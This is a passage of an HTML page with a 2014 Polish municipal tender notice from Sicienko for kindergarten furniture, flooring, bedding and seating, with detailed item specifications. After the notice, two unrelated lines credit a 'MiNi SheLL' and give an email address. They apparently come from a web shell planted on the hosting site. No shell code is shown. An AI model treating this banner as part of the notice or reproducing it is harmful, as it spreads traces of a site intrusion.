</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Kopia dowodu zapłaty wadium, 
2.Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeśli osoba podpisującą nie jest osobą upoważnioną na podstawie dokumentu wymienionego w § 6 pkt. II ppkt.2 SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany treści umowy w przypadkach określonych w załączonym do SIWZ projekcie umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sicienko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Sicienku, ul.Mrotecka 9; 86-014 Sicienko woj.kujawsko-pomorskie...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2014 godzina 09:00, miejsce: Urząd Gminy w Sicienku, ul.Mrotecka 9; 86-014 Sicienko woj.kujawsko-pomorskie pok.1b.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 24.11.2014.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany jest ze środków Unii Europejskiej z Programu Operacyjnego Kapitał Ludzki w ramach Priorytetu IX. Rozwój wykształcenia i kompetencji w regionach...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup i montaż mebli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.Meble i wyposażenie - zakup i montaż:
Podane poniżej wymiary mebli mają charakter orientacyjny. Dopuszcza się odstępstwa od wymiarów poszczególnych elementów w zakresie +-5cm. 
1)	Zestaw mebli przedszkolnych - zestaw składający się z 11 różnych szaf i szafek, z których można stworzyć jednolity zestaw lub podzielić na kilka mniejszych; wykonany z płyty laminowanej min. 18mm, obrzeża z PCV 2 mm, korpusy i obrzeża w kolorze buk, fronty kolorowe (co najmniej 2 kolory wkomponowane w zestaw spośród: niebieski, czerwony, zielony, żółty, pomarańczowy, fioletowy); uchwyty jednolite: kulki drewniane lub odpowiednie wycięcia / żłobienia umożliwiające otwarcie. 11 zestawów.
Skład zestawu: 
Wymiary w kolejności: wysokość / szerokość / głębokość. 
a)	szafka z 4 szufladami na całej szerokości, wymiary 80x80x39cm; szuflady kolorowe;
b)	regał z półkami odkrytymi u góry i dwoma szufladami na dole - wymiary 152x80x39cm, min. 4 odkryte półki (5 przestrzeni) oraz 2 szuflady z kolorowymi frontami;
c)	regał z półkami odkrytymi u góry i czterema drzwiczkami na dole - wymiary 162x90x39cm, regał podzielony na 8 części - na górze 2 półki odkryte podzielone na pół płytą (razem tworzą 4 półki), na dole szafka z czterema drzwiczkami (fronty kolorowe); góra zakończona płasko lub ozdobnie;
d)	regał z półkami po jednej stronie, z drzwiczkami po drugiej stronie - wymiary 90x90x39cm, szafka z dwiema lub trzema półkami po jednej stronie - front szafki kolorowy; po drugiej stronie 1 lub 2 półki; góra zakończona płasko lub ozdobnie;
e)	regał z półkami u góry i dwoma drzwiczkami na dole - wymiary 162x90x39cm, na górze 2 półki odkryte podzielone na pół płytą (razem tworzą 4 półki), na dole szafka z dwoma drzwiczkami (fronty kolorowe), w szafce co najmniej 1 półka; góra zakończona płasko lub ozdobnie;
f)	 regał dwudrzwiowy - wymiary 90x90x39cm, szafka z dwoma drzwiczkami (fronty kolorowe), w środku co najmniej 1 półka; góra zakończona płasko lub ozdobnie;
g)	regał z szufladami po jednej stronie, z pojedynczymi drzwiczkami po drugiej stronie - wymiary 90x90x39cm, szafka z 4 szufladami po jednej stronie i szafką  z 1 drzwiczkami po drugiej stronie, w szafce min. 1 półka, fronty szuflad i drzwiczek: kolorowe; góra zakończona płasko lub ozdobnie;
h)	szafa skrytkowa z drzwiczkami na klucz - wymiary 190x80x40cm, szafa składa się z 10 równych schowków zamykanych na klucz (zamki patentowe w komplecie; kolor: buk, drzwi w kolorze buk lub buk z jednym z kolorów wymienionych w punkcie 1);
i)	regał z plastikowymi pojemnikami na zabawki - wymiary 90x90x39cm, pojemniki plastikowe różnej wielkości (min. 5 szt.) wysuwane na prowadnicach; pojemniki kolorowe; góra zakończona płasko lub ozdobnie;
j)	regał z półkami z jednej strony i plastikowymi takiej samej wielkości pojemnikami na zabawki z drugiej strony - wymiary 90x90x39cm; z jednej strony półki (co najmniej 1 w połowie wysokości szafki), z drugiej plastikowe pojemniki - min. 5 szt. na prowadnicach; pojemniki jednokolorowe np. czerwone, wszystkie jednakowej wielkości; góra zakończona płasko lub ozdobnie;
k)	regał z 10 szufladami - wymiary 110x90x39 cm, 5 szuflad po każdej stronie; fronty szuflad kolorowe; góra zakończona płasko lub ozdobnie;

2)	Biurko dla nauczyciela - wymiary 160x60x76cm z płyty laminowanej 18mm z trwałym obrzeżem PCV 2mm, z 4 szufladami po jednej stronie, z szafką i otwartą półką po drugiej stronie oraz z półką klawiatury, kolor: buk - 11 szt.
3)	Krzesło dla nauczyciela - krzesło obrotowe z regulacją kąta pochylenia i wysokości oparcia, na podnośniku gazowym, profilowane siedzisko i oparcie ze specjalnej, trwałej pianki PUR - 11 szt;
4)	Stoliki przedszkolne prostokątne - o wymiarach 120x70cm (wys. nr 2 i nr 3), z blatem z płyty laminowanej 18mm w kolorze buk, z mocnym półokrągłym obrzeżem - profilem T. Stelaż metalowy złożony z ramy i 4 stabilnych nóg o średnicy min. 50 mm zaopatrzonych w regulatory wysokości. Blat mocowany do stelaża w sposób trwały i estetyczny za pomocą śrub i mufek (nie wkrętów); stelaż i profil T kolorowy: żółty - 22 szt, z tego 12 szt. o wysokości nr 2, 10 szt. o wysokości nr 3;
5)	Stoliki przedszkolne sześciokątne - o przekątnej 120cm (wys. nr 2 i nr 3), z blatem z płyty laminowanej 18mm z mocnym półokrągłym obrzeżem - profilem T. Stelaż metalowy złożony z ramy i 6 stabilnych nóg o średnicy min. 50 mm zaopatrzonych w regulatory wysokości. Blat mocowany do stelaża w sposób trwały i estetyczny za pomocą śrub i mufek (nie wkrętów); stelaż i profil T w kolorze żółtym - razem 16 szt, z tego 8 szt. o wysokości nr 2 oraz 8 sztuk o wysokości nr 3;
6)	Krzesełka przedszkolne - krzesła na metalowym stelażu z profilu 20x20 o stałej wysokości (nr 2 i nr 3),kolor stelażu: żółty, siedzisko i oparcie z profilowanej i lakierowanej sklejki - kolor: buk - szt. 130, w tym 49 o wysokości nr 2 i 81 o wysokości nr 3; 
7)	Tablica suchościeralna - tablica szkolna, suchościeralna, biała, z magnetycznej blachy tablicowej w listwach bocznych z profilu aluminiowego, łączonego na rogach estetycznymi półkolami z tworzywa sztucznego, w komplecie półka na pisaki i zestaw montażowy; wymiary 170x100cm - 9 szt; 
8)	Tablica trzyczęściowa biała gładka: w ramie z aluminium, tablica centralna o wym. 170 x 100 cm, dwie tablice dwustronne o wym. 85 x 100 cm, w komplecie półeczka na gąbkę i markery, powierzchnia lakierowana - 2 szt.;
9)	Tablica korkowa: w ramie z aluminium, wymiary: 90x150 cm - 5 szt., 
10)	Tablica korkowa: w ramie z aluminium, wymiary: 100x200 cm - 12 szt.
11)	Dywan: wymiary 3x4m; tkany maszynowo, kolorowy motyw bajkowy lub zwierzęcy, co najmniej 2 różne wzory - 3 szt.;
12)	Dywan: wymiary 4x5m, tkany maszynowo, kolorowy motyw bajkowy lub zwierzęcy, co najmniej 2 różne wzory - 10 szt.;
13)	Regał z czterema półkami - regał o wymiarach 190x80x40cm (wys/szer/gł), 
z płyty laminowanej 18mm i trwałego obrzeża PCV 2mm, 4 półki, (5 przestrzeni segregatorowych) na płycinowym cokole lub na imbusowych stopkach, kolor: buk - szt. 4;
14)	Szafa dwudrzwiowa z czterema półkami - szafa o wymiarach 190x80x40cm (wys/szer/gł), z płyty laminowanej 18mm i trwałego obrzeża PCV 2mm, 4 półki (5 przestrzeni segregatorowych) na płycinowym cokole lub na imbusowych stopkach, kolor: buk - szt. 4,
15)	Stolik piankowy - okrągły puf piankowy pokryty tkaniną PCW, może służyć jako siedzisko lub stolik wymiary: średnica 30-45cm, wysokość 25-45cm, - szt. 6.

II. Meble do wyposażenia szatni - zakup i montaż:
1.	Szafki na ubrania - zestaw szatniowy 6-osobowy, wykonany z płyty wiórowej laminowanej, kolor: buk (jedyny kolor lub wiodący), na górze półki np. na czapki, na dole na obuwie z ławką/półką do siedzenia, pod górnymi półkami metalowe wieszaki, wymiary: szer. 130-155 cm, gł. 40-50 cm, wys. 130-141cm - 28 kompletów,
2.	Wieszak szatniowy jednostronny - wykonany z konstrukcji stalowej/metalowej, siedzisko i oparcie z lakierowanych desek np. sosnowych lub z płyty laminowanej, na górze 6 haczyków na ubrania (pojedyncze lub podwójne) - 10 szt.,
3.	Wieszak szatniowy dwustronny - wykonany z konstrukcji stalowej/metalowej, siedzisko i oparcie z lakierowanych desek np. sosnowych lub z płyty laminowanej, na górze 6 haczyków na ubrania po każdej stronie (pojedyncze lub podwójne) - 2 szt.,
4.	Szafa ubraniowa dwudrzwiowa - wykonana z płyty laminowanej o gr. min. 18mm, wyposażona w półkę górną oraz drążek na wieszaki ubraniowe, kolor: buk; wymiary 185-205x76-90x53-60 (wys/szer/gł) - 2 szt.,
5.	Szafa ubraniowa jednodrzwiowa - wykonana z płyty laminowanej o gr. min. 18 mm, wyposażona w półkę górną oraz drążek na wieszaki ubraniowe, kolor: buk; wymiary 180-186 x 50-60 x 58-80 (wys/szer/gł) - 1 szt.,
6.	Szafa aktowa dwudrzwiowa - wykonana z płyty laminowanej, wymiary: 180-182-186 x 76-80 x 38-40 cm; 5 przestrzeni segregatorowych, kolor buk, zamek i klucze w zestawie - 1 szt,
7.	Regał z półkami - regał otwarty wykonany z płyty laminowanej o gr. min. 18mm, wymiary, wewnątrz 2 półki (3 przestrzenie segregatorowe) - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> wyposażenie - zakup i montaż.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykładzina obiektowa heterogeniczna - wykładzina co najmniej trójkolorowa (mozaika), antypoślizgowa, powierzchnia podłogi 49,84 m.kw. (560x890cm), powierzchnia cokołów 2,90 m.kw. Przed montażem wykładziny należy: zdemontować i usunąć posadzkę z tworzyw sztucznych 49,84 m.kw., przygotować stare podłoże pod docieplenie metodą lekką - mokrą poprzez gruntowanie emulsją gruntującą, wykonać warstwy wyrównujące i wygładzające z zaprawy samopoziomującej grub. 5 mm, dodatek lub potrącenie na zmianę grubości o 1 mm warstwy wyrównującej i wygładzającej z zaprawy samopoziomującej, zamontować nową wykładzinę PCV; cokoły z wywinięciem na ścianę na wys. 10cm, uprzątnąć i wywieźć zdemontowaną posadzkę i gruz - 1 szt;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.11.22.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wyposażenie wypoczynkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Łóżeczko przedszkolne - łóżeczko o wymiarach: długość 130-140cm, szerokość: 55-60 cm; konstrukcja stalowa (obrzeża); powierzchnia do spania z tkaniny przepuszczającej powietrze, narożniki łóżeczka wykonane z tworzywa sztucznego - ich konstrukcja powinna umożliwiać układanie łóżeczek jedno na drugim - szt. 62,
2)	Pościel dziecięca - poduszka i kołderka z atestowanym wypełnieniem z możliwością prania w pralce, powłoczka na poduszkę, kołderka lub kocyk, prześcieradło z gumką; materiał: bawełna 100%, powłoczki kolorowe z motywami bajkowymi, wymiary prześcieradła i pościeli dostosowane do wielkości łóżeczka opisanego w pkt. 1 - 50 kompletów;
3)	Poduszki okrągłe - poduszki do siedzenia (siedziska), wykonane z tkaniny PCV; wypełnione gąbką, różnokolorowe; średnica 30-35 cm, wysokość 3-5cm  - 110 szt (mogą być komplety),
4)	Poduszki kwadratowe - poduszki do siedzenia (siedziska) o wymiarach minimalnych: dł/szer. 30 cm, wysokość 5 cm, obszyte tkaniną PCV, różnokolorowe - 80 szt. (mogą być komplety);
5)	Poduszki sensoryczne w kształcie zwierzątek - miękkie siedziska wypełnione granulatem, pokryte zmywalną tkaniną PCV, wysokość ok. 60 cm, różnokolorowe z elementami sensorycznymi np. nosek, uszy, łapki - 25 szt.
6)	Pufa z motywem zwierzęcym - pufa wypełniona pianką, pokryta bawełnianym pokrowcem, który można prać lub tkanina PCV, wysokość ok. 30 cm, kolorystyka i dodatkowe elementy np. uszy imitują zwierzątka np. zebrę, żabę, małpę itp.; oferta winna zawierać min. 3 różne zwierzątka - 28 szt.
7)	Siedzisko z granulatem - miękka, wygodna poducha wypełniona granulatem, dopasowująca się kształtem do osoby siedzącej, pokryta tkanina PCV, wymiary: średnica ok. 80 cm, wysokość ok. 60 cm, różne kolory - 22 szt.
8)	Kanapa dziecięca trzymiejscowa - wymiary ok. 137 x 57 x 56 cm (+-10 cm), miękka, wygodna, z oparciem, minimum dwukolorowa - szt. 11;
9)	Materac trzyczęściowy - wykonany z twardej pianki poliuretanowej pokrytej zmywalnym materiałem np. tkaniną PCV, długość: 180 - 200 cm, szerokość: 90-115cm, grubość: 5 cm- 13 szt.
10)	Materac narożny w kształcie serca - kolorowy materac narożny z naszytymi aplikacjami kolorowych serc, służący zarówno do wypoczynku, jak i zabawy; pokrycie bawełniane, wym. 150 x 150 x 15 cm - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com